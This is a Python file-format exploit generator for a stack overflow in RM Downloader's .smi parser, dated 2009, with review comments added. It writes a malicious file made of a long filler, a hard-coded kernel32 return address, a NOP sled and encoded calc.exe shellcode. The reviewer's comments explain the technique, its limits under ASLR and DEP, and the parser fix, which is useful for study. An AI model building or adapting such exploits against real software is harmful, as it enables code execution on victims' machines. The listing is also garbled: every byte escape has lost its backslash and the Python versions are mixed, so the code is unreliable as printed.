# Title : RM Downloader (.smi File) Local Stack Overflow Exploit
# Published : 2009-05-01
# Author : ThE g0bL!N
#usage: exploit.py
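# Proof-of-concept generator for a file-format stack overflow in RM Downloader
# (.smi input).  It writes one file, exploit.smi, built from a long filler, a
# hard-coded return address, a short NOP sled and a payload.  Nothing here is
# network-facing: the overflow is only reached when the vulnerable player
# parses the generated file.
#
# NOTE(review): in this listing every "\x.." escape has lost its backslash
# (e.g. "x41", "x90"), so as printed the literals are plain ASCII text rather
# than the byte values the author intended.  They are kept byte-for-byte here.
# The same applies to the "n"/"rn" line-ending fragments below.
print("**************************************************************************")
print(" RM Downloader (.smi) Local Stack Overflown")
print(" Exploit code: ThE g0bL!N")
print(" Tested on: Windows XP Pro SP3 (EN)n")
print(" greetz: His0k4 Dos-Dz TeaM-Snakes Team and all My friendn")
print("**************************************************************************")

# Filler that overruns the fixed-size stack buffer; the repeat count is
# presumably the offset to the saved return address on the tested build.
buff = "x41" * 26083
# The saved return address is overwritten with a fixed kernel32.dll address
# (a "jmp esp" per the author's comment).  A hard-coded address like this only
# holds for the exact OS / service pack / language build it was taken from;
# ASLR invalidates it and DEP blocks execution from the stack altogether.  The
# root-cause fix is a bounded copy in the .smi parser.
jump = "x5Dx38x82x7C" # jmp esp kernel32.dll
nops = "x90"*6
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
# Per the author's comment this is an encoded calc.exe launcher, i.e. a benign
# demonstration payload.
shellcode = (
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x4b"
"x1dxa3xb6x83xebxfcxe2xf4xb7xf5xe7xb6x4bx1dx28xf3"
"x77x96xdfxb3x33x1cx4cx3dx04x05x28xe9x6bx1cx48xff"
"xc0x29x28xb7xa5x2cx63x2fxe7x99x63xc2x4cxdcx69xbb"
"x4axdfx48x42x70x49x87xb2x3exf8x28xe9x6fx1cx48xd0"
"xc0x11xe8x3dx14x01xa2x5dxc0x01x28xb7xa0x94xffx92"
"x4fxdex92x76x2fx96xe3x86xcexddxdbxbaxc0x5dxafx3d"
"x3bx01x0ex3dx23x15x48xbfxc0x9dx13xb6x4bx1dx28xde"
"x77x42x92x40x2bx4bx2ax4exc8xddxd8xe6x23xedx29xb2"
"x14x75x3bx48xc1x13xf4x49xacx7exc2xdax28x1dxa3xb6")

# Layout of the written file: filler, overwritten return address, sled, payload.
exploit = buff + jump + nops + shellcode

try:
    # Why `with`: the original open()/write()/close() sequence left the file
    # handle open if write() raised; the context manager always closes it.
    with open("exploit.smi", 'w') as out_file:
        out_file.write(exploit + "rn")
    raw_input("nExploit file created!n")
except Exception as err:
    # Narrowed from a bare `except:` (which also swallowed KeyboardInterrupt
    # and SystemExit) and made informative instead of a bare "Error".
    print("Error: %s" % err)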
# www.Syue.com [2009-05-01]